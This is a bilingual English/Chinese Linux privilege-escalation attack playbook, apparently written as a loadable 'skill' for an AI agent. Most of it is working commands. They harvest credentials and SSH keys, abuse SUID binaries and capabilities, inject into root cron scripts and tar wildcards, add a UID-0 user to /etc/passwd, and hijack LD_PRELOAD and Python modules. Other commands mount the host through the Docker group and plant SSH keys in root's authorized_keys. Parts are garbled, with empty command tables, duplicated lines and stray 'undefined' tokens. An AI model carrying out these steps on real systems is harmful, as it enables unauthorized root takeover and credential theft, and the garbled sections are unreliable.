linux-privilege-escalation
Compare original and translation side by side
🇺🇸
Original
English🇨🇳
Translation
ChineseSKILL: Linux Privilege Escalation — Expert Attack Playbook
SKILL: Linux Privilege Escalation — 专家级攻击手册
AI LOAD INSTRUCTION: Expert Linux privesc techniques. Covers enumeration, SUID/SGID, capabilities, cron abuse, kernel exploits, NFS, writable passwd/shadow, LD_PRELOAD, Docker group, and library hijacking. Base models miss subtle escalation paths via capabilities and combined misconfigurations.
AI加载指令:专家级Linux提权技术,覆盖枚举、SUID/SGID、capabilities、cron滥用、内核漏洞、NFS、可写passwd/shadow、LD_PRELOAD、Docker用户组、库劫持。基础模型会遗漏通过capabilities和组合配置错误实现的隐蔽提权路径。
0. RELATED ROUTING
0. 相关路由
Before going deep, consider loading:
- container-escape-techniques when the target is a container and you need to escape to host
- linux-security-bypass when facing restricted shells, AppArmor, SELinux, or seccomp
- linux-lateral-movement after obtaining root for pivoting to adjacent hosts
- kubernetes-pentesting when the host is a Kubernetes node
在深入学习前,可考虑加载以下内容:
- container-escape-techniques 当目标是容器且你需要逃逸到宿主机时
- linux-security-bypass 当遇到受限shell、AppArmor、SELinux或seccomp时
- linux-lateral-movement 获得root权限后需要横向移动到相邻主机时
- kubernetes-pentesting 当目标主机是Kubernetes节点时
Advanced Reference
高级参考
Also load SUID_CAPABILITIES_TRICKS.md when you need:
- Top 30 SUID binaries with exact exploitation commands (GTFOBins)
- Capability-specific exploitation for each dangerous cap
- Custom SUID binary exploitation methodology
Also load KERNEL_EXPLOITS_CHECKLIST.md when you need:
- Kernel version → exploit mapping table (DirtyPipe, DirtyCow, OverlayFS, etc.)
- Exploit compilation tips and cross-compilation notes
- Kernel exploit stability assessment
如果有以下需求也可加载SUID_CAPABILITIES_TRICKS.md:
- 排名前30的SUID二进制文件及对应精确利用命令(GTFOBins)
- 每个危险capability的专属利用方法
- 自定义SUID二进制文件利用方法论
如果有以下需求也可加载KERNEL_EXPLOITS_CHECKLIST.md:
- 内核版本→漏洞利用映射表(DirtyPipe、DirtyCow、OverlayFS等)
- 漏洞利用编译技巧和交叉编译注意事项
- 内核漏洞稳定性评估
1. ENUMERATION CHECKLIST
1. 枚举检查清单
Run these immediately after landing a shell:
拿到shell后立即运行以下命令:
System Info
系统信息
bash
uname -a # Kernel version
cat /etc/os-release # Distro and version
cat /proc/version # Kernel compile info
hostname && id && whoami # Current contextbash
uname -a # Kernel version
cat /etc/os-release # Distro and version
cat /proc/version # Kernel compile info
hostname && id && whoami # Current contextSudo & SUID/SGID
Sudo & SUID/SGID
bash
sudo -l # What can we run as root?
find / -perm -4000 -type f 2>/dev/null # SUID binaries
find / -perm -2000 -type f 2>/dev/null # SGID binaries
getcap -r / 2>/dev/null # Files with capabilitiesbash
sudo -l # What can we run as root?
find / -perm -4000 -type f 2>/dev/null # SUID binaries
find / -perm -2000 -type f 2>/dev/null # SGID binaries
getcap -r / 2>/dev/null # Files with capabilitiesCron & Timers
Cron & 定时任务
bash
cat /etc/crontab
ls -la /etc/cron.*
crontab -l
systemctl list-timers --all # systemd timersbash
cat /etc/crontab
ls -la /etc/cron.*
crontab -l
systemctl list-timers --all # systemd timersWritable Files & Dirs
可写文件与目录
bash
find / -writable -type f 2>/dev/null | grep -v proc
ls -la /etc/passwd /etc/shadow # Check permissions
find / -perm -o+w -type d 2>/dev/null # World-writable dirsbash
find / -writable -type f 2>/dev/null | grep -v proc
ls -la /etc/passwd /etc/shadow # Check permissions
find / -perm -o+w -type d 2>/dev/null # World-writable dirsNetwork & Services
网络与服务
bash
ss -tlnp # Listening services
cat /proc/net/tcp # Raw TCP connections
ps aux # Running processes
env # Environment variables (credentials?)bash
ss -tlnp # Listening services
cat /proc/net/tcp # Raw TCP connections
ps aux # Running processes
env # Environment variables (credentials?)Credential Locations
凭证位置
bash
cat ~/.bash_history
cat ~/.mysql_history
find / -name "*.conf" -o -name "*.cfg" -o -name "*.ini" 2>/dev/null | head -30
find / -name "id_rsa" -o -name "*.pem" -o -name "*.key" 2>/dev/nullbash
cat ~/.bash_history
cat ~/.mysql_history
find / -name "*.conf" -o -name "*.cfg" -o -name "*.ini" 2>/dev/null | head -30
find / -name "id_rsa" -o -name "*.pem" -o -name "*.key" 2>/dev/null2. SUID/SGID EXPLOITATION
2. SUID/SGID漏洞利用
GTFOBins Methodology
GTFOBins方法论
- Find SUID binaries:
find / -perm -4000 -type f 2>/dev/null - Cross-reference each with GTFOBins
- Use the "SUID" section specifically — not all binary abuse works with SUID
- 查找SUID二进制文件:
find / -perm -4000 -type f 2>/dev/null - 逐个与GTFOBins进行交叉比对
- 专门使用"SUID"章节的方法——并非所有二进制文件滥用方式都适用于SUID场景
Quick-Win SUID Escalations
快速生效的SUID提权
| Binary | Command |
|---|---|
| |
| |
| |
| |
| |
| |
| |
| |
| Copy |
| 二进制文件 | 命令 |
|---|---|
| |
| |
| |
| |
| |
| |
| |
| |
| 复制 |
Shared Library Hijacking (SUID Binary)
共享库劫持(SUID二进制文件)
bash
ldd /usr/local/bin/suid_binary # Check loaded libraries
strace /usr/local/bin/suid_binary 2>&1 | grep -i "open.*\.so" # Find load pathsbash
ldd /usr/local/bin/suid_binary # Check loaded libraries
strace /usr/local/bin/suid_binary 2>&1 | grep -i "open.*\.so" # Find load pathsIf it loads from a writable directory — inject constructor:
If it loads from a writable directory — inject constructor:
gcc -shared -fPIC -o /writable/path/libevil.so evil.c
gcc -shared -fPIC -o /writable/path/libevil.so evil.c
evil.c: attribute((constructor)) → setuid(0); system("/bin/bash -p")
evil.c: attribute((constructor)) → setuid(0); system("/bin/bash -p")
---
---3. CAPABILITIES ABUSE
3. CAPABILITIES滥用
| Capability | Risk | Exploitation |
|---|---|---|
| Critical | |
| Critical | Read/write any file regardless of permissions |
| High | Read any file — dump |
| Critical | Mount filesystems, BPF, namespace manipulation |
| High | Inject into root processes via ptrace |
| Medium | Sniff traffic, ARP spoofing |
| Low | Bind to privileged ports (<1024) |
| High | Change ownership of any file |
bash
undefined| Capability | 风险等级 | 利用方法 |
|---|---|---|
| 严重 | |
| 严重 | 无视权限读写任意文件 |
| 高 | 读取任意文件——导出 |
| 严重 | 挂载文件系统、BPF、命名空间操作 |
| 高 | 通过ptrace向root进程注入代码 |
| 中 | 嗅探流量、ARP欺骗 |
| 低 | 绑定特权端口(<1024) |
| 高 | 修改任意文件的所有者 |
bash
undefinedFind binaries with capabilities
Find binaries with capabilities
getcap -r / 2>/dev/null
getcap -r / 2>/dev/null
Example: python3 with cap_setuid
Example: python3 with cap_setuid
/usr/bin/python3 = cap_setuid+ep
/usr/bin/python3 = cap_setuid+ep
python3 -c 'import os; os.setuid(0); os.system("/bin/bash")'
---python3 -c 'import os; os.setuid(0); os.system("/bin/bash")'
---4. CRON / TIMER ABUSE
4. CRON / 定时任务滥用
Writable Cron Scripts
可写Cron脚本
bash
undefinedbash
undefinedFind cron jobs running as root
Find cron jobs running as root
cat /etc/crontab | grep root
ls -la /etc/cron.d/
cat /etc/crontab | grep root
ls -la /etc/cron.d/
If a root-owned cron runs a script writable by current user:
If a root-owned cron runs a script writable by current user:
echo 'cp /bin/bash /tmp/bash && chmod +s /tmp/bash' >> /writable/script.sh
echo 'cp /bin/bash /tmp/bash && chmod +s /tmp/bash' >> /writable/script.sh
Wait for cron → /tmp/bash -p
Wait for cron → /tmp/bash -p
undefinedundefinedPATH Hijacking in Cron
Cron中的PATH劫持
bash
undefinedbash
undefinedIf crontab has: PATH=/home/user:/usr/local/bin:/usr/bin
If crontab has: PATH=/home/user:/usr/local/bin:/usr/bin
And runs: * * * * * root backup.sh (without full path)
And runs: * * * * * root backup.sh (without full path)
Create /home/user/backup.sh:
Create /home/user/backup.sh:
echo '#!/bin/bash' > /home/user/backup.sh
echo 'cp /bin/bash /tmp/rootbash && chmod +s /tmp/rootbash' >> /home/user/backup.sh
chmod +x /home/user/backup.sh
undefinedecho '#!/bin/bash' > /home/user/backup.sh
echo 'cp /bin/bash /tmp/rootbash && chmod +s /tmp/rootbash' >> /home/user/backup.sh
chmod +x /home/user/backup.sh
undefinedWildcard Injection (tar)
通配符注入(tar)
bash
undefinedbash
undefinedIf cron runs: tar czf /backup/archive.tar.gz *
If cron runs: tar czf /backup/archive.tar.gz *
In the target directory, create:
In the target directory, create:
echo 'cp /bin/bash /tmp/bash && chmod +s /tmp/bash' > shell.sh
echo "" > "--checkpoint-action=exec=sh shell.sh"
echo "" > "--checkpoint=1"
echo 'cp /bin/bash /tmp/bash && chmod +s /tmp/bash' > shell.sh
echo "" > "--checkpoint-action=exec=sh shell.sh"
echo "" > "--checkpoint=1"
tar interprets filenames as arguments
tar interprets filenames as arguments
undefinedundefinedpspy — Monitor Processes Without Root
pspy — 无需root权限监控进程
bash
undefinedbash
undefinedUpload pspy64 or pspy32 to target
Upload pspy64 or pspy32 to target
./pspy64
./pspy64
Watch for cron jobs, services, and background processes
Watch for cron jobs, services, and background processes
---
---5. NFS NO_ROOT_SQUASH
5. NFS NO_ROOT_SQUASH
bash
undefinedbash
undefinedOn attacker: check exported shares
On attacker: check exported shares
showmount -e TARGET_IP
showmount -e TARGET_IP
If no_root_squash is set:
If no_root_squash is set:
mount -t nfs TARGET_IP:/share /mnt/nfs
mount -t nfs TARGET_IP:/share /mnt/nfs
As root on attacker box:
As root on attacker box:
cp /bin/bash /mnt/nfs/bash
chmod +s /mnt/nfs/bash
cp /bin/bash /mnt/nfs/bash
chmod +s /mnt/nfs/bash
On target:
On target:
/share/bash -p # root shell
---/share/bash -p # root shell
---6. WRITABLE /etc/passwd OR /etc/shadow
6. 可写/etc/passwd 或 /etc/shadow
Writable /etc/passwd
可写/etc/passwd
bash
undefinedbash
undefinedGenerate password hash
Generate password hash
openssl passwd -1 -salt xyz password123
openssl passwd -1 -salt xyz password123
→ $1$xyz$...hash...
→ $1$xyz$...hash...
Append root-equivalent user
Append root-equivalent user
echo 'hacker:$1$xyz$hash:0:0::/root:/bin/bash' >> /etc/passwd
echo 'hacker:$1$xyz$hash:0:0::/root:/bin/bash' >> /etc/passwd
Or replace root's 'x' with generated hash (if no shadow file)
Or replace root's 'x' with generated hash (if no shadow file)
undefinedundefinedWritable /etc/shadow
可写/etc/shadow
bash
undefinedbash
undefinedGenerate SHA-512 hash
Generate SHA-512 hash
mkpasswd -m sha-512 password123
mkpasswd -m sha-512 password123
Replace root's hash in /etc/shadow
Replace root's hash in /etc/shadow
---
---7. LD_PRELOAD / LD_LIBRARY_PATH WITH SUDO
7. SUDO搭配LD_PRELOAD / LD_LIBRARY_PATH
bash
undefinedbash
undefinedIf sudo -l shows: env_keep+=LD_PRELOAD or env_keep+=LD_LIBRARY_PATH
If sudo -l shows: env_keep+=LD_PRELOAD or env_keep+=LD_LIBRARY_PATH
Compile .so with _init() that calls setresuid(0,0,0) + system("/bin/bash -p")
Compile .so with _init() that calls setresuid(0,0,0) + system("/bin/bash -p")
gcc -fPIC -shared -nostartfiles -o /tmp/pe.so /tmp/pe.c
sudo LD_PRELOAD=/tmp/pe.so /usr/bin/some_allowed_binary
---gcc -fPIC -shared -nostartfiles -o /tmp/pe.so /tmp/pe.c
sudo LD_PRELOAD=/tmp/pe.so /usr/bin/some_allowed_binary
---8. DOCKER GROUP → ROOT
8. DOCKER用户组 → ROOT权限
bash
undefinedbash
undefinedIf current user is in the docker group:
If current user is in the docker group:
id # check for "docker" in groups
id # check for "docker" in groups
Mount host filesystem
Mount host filesystem
docker run -v /:/mnt --rm -it alpine chroot /mnt sh
docker run -v /:/mnt --rm -it alpine chroot /mnt sh
Or add SSH key
Or add SSH key
docker run -v /root:/mnt --rm -it alpine sh -c
'echo "ssh-rsa AAAA..." >> /mnt/.ssh/authorized_keys'
'echo "ssh-rsa AAAA..." >> /mnt/.ssh/authorized_keys'
---docker run -v /root:/mnt --rm -it alpine sh -c
'echo "ssh-rsa AAAA..." >> /mnt/.ssh/authorized_keys'
'echo "ssh-rsa AAAA..." >> /mnt/.ssh/authorized_keys'
---9. PYTHON / PERL / RUBY LIBRARY HIJACKING
9. PYTHON / PERL / RUBY库劫持
bash
undefinedbash
undefinedPython: if a root-executed script does "import somelib"
Python: if a root-executed script does "import somelib"
Check python path order:
Check python path order:
python3 -c 'import sys; print("\n".join(sys.path))'
python3 -c 'import sys; print("\n".join(sys.path))'
Place malicious module in writable path that comes first:
Place malicious module in writable path that comes first:
cat > /writable/path/somelib.py << 'EOF'
import os
os.system("cp /bin/bash /tmp/bash && chmod +s /tmp/bash")
EOF
cat > /writable/path/somelib.py << 'EOF'
import os
os.system("cp /bin/bash /tmp/bash && chmod +s /tmp/bash")
EOF
Perl: PERL5LIB / @INC manipulation
Perl: PERL5LIB / @INC manipulation
Ruby: RUBYLIB / $LOAD_PATH manipulation
Ruby: RUBYLIB / $LOAD_PATH manipulation
---
---10. AUTOMATED TOOLS
10. 自动化工具
| Tool | Purpose | Command |
|---|---|---|
| LinPEAS | Comprehensive enumeration | |
| linux-exploit-suggester | Kernel exploit suggestions | |
| pspy | Monitor processes (no root needed) | |
| LinEnum | Legacy enumeration | |
| GTFOBins | SUID/sudo/capability abuse reference | https://gtfobins.github.io/ |
| 工具 | 用途 | 命令 |
|---|---|---|
| LinPEAS | 全面枚举 | |
| linux-exploit-suggester | 内核漏洞推荐 | |
| pspy | 进程监控(无需root) | |
| LinEnum | 传统枚举工具 | |
| GTFOBins | SUID/sudo/capability滥用参考 | https://gtfobins.github.io/ |
11. PRIVILEGE ESCALATION DECISION TREE
11. 权限提升决策树
Low-privilege shell obtained
│
├── sudo -l shows entries?
│ ├── GTFOBins match? → exploit directly
│ ├── env_keep has LD_PRELOAD? → LD_PRELOAD hijack (§7)
│ ├── NOPASSWD on custom script? → review script for injection
│ └── (ALL) with password? → check for password reuse/hashes
│
├── SUID/SGID binaries found?
│ ├── Standard binary on GTFOBins? → SUID exploit (§2)
│ ├── Custom binary? → reverse engineer, check libs (strace/ltrace)
│ └── Shared lib from writable path? → library hijack (§2)
│
├── Capabilities on binaries?
│ ├── cap_setuid? → instant root (§3)
│ ├── cap_dac_override? → write /etc/passwd (§6)
│ ├── cap_sys_admin? → mount / namespace tricks
│ └── cap_sys_ptrace? → process injection
│
├── Cron jobs running as root?
│ ├── Writable script? → inject payload (§4)
│ ├── Missing full path? → PATH hijack (§4)
│ └── Uses wildcards? → wildcard injection (§4)
│
├── Writable sensitive files?
│ ├── /etc/passwd writable? → add root user (§6)
│ ├── /etc/shadow writable? → replace root hash (§6)
│ └── systemd unit files writable? → add ExecStartPre
│
├── Docker/LXD group membership?
│ └── Yes → mount host filesystem (§8)
│
├── NFS shares with no_root_squash?
│ └── Yes → SUID binary via NFS (§5)
│
├── Kernel version old/unpatched?
│ └── Check KERNEL_EXPLOITS_CHECKLIST.md
│
└── None of the above?
├── Run LinPEAS for comprehensive scan
├── Check for password reuse (bash_history, config files)
├── Check internal services (127.0.0.1 listeners)
└── Monitor processes with pspy for hidden opportunities已获得低权限shell
│
├── sudo -l存在可执行条目?
│ ├── 匹配GTFOBins规则?→ 直接利用
│ ├── env_keep包含LD_PRELOAD?→ LD_PRELOAD劫持(§7)
│ ├── 自定义脚本支持NOPASSWD?→ 检查脚本是否存在注入点
│ └── 需密码的(ALL)权限?→ 检查密码复用/哈希
│
├── 找到SUID/SGID二进制文件?
│ ├── GTFOBins收录的标准二进制?→ SUID利用(§2)
│ ├── 自定义二进制?→ 逆向分析,检查依赖库(strace/ltrace)
│ └── 从可写路径加载共享库?→ 库劫持(§2)
│
├── 二进制文件存在capabilities?
│ ├── 含cap_setuid?→ 直接获取root(§3)
│ ├── 含cap_dac_override?→ 写入/etc/passwd(§6)
│ ├── 含cap_sys_admin?→ 挂载/命名空间技巧
│ └── 含cap_sys_ptrace?→ 进程注入
│
├── 存在root身份运行的Cron任务?
│ ├── 脚本可写?→ 注入 payload(§4)
│ ├── 未使用完整路径?→ PATH劫持(§4)
│ └── 使用通配符?→ 通配符注入(§4)
│
├── 存在可写敏感文件?
│ ├── /etc/passwd可写?→ 添加root用户(§6)
│ ├── /etc/shadow可写?→ 替换root哈希(§6)
│ └── systemd unit文件可写?→ 添加ExecStartPre
│
├── 属于Docker/LXD用户组?
│ └── 是 → 挂载宿主机文件系统(§8)
│
├── NFS共享开启no_root_squash?
│ └── 是 → 通过NFS放置SUID二进制(§5)
│
├── 内核版本过旧/未打补丁?
│ └── 检查KERNEL_EXPLOITS_CHECKLIST.md
│
└── 以上都不满足?
├── 运行LinPEAS进行全面扫描
├── 检查密码复用(bash_history、配置文件)
├── 检查内部服务(127.0.0.1监听端口)
└── 用pspy监控进程寻找隐藏机会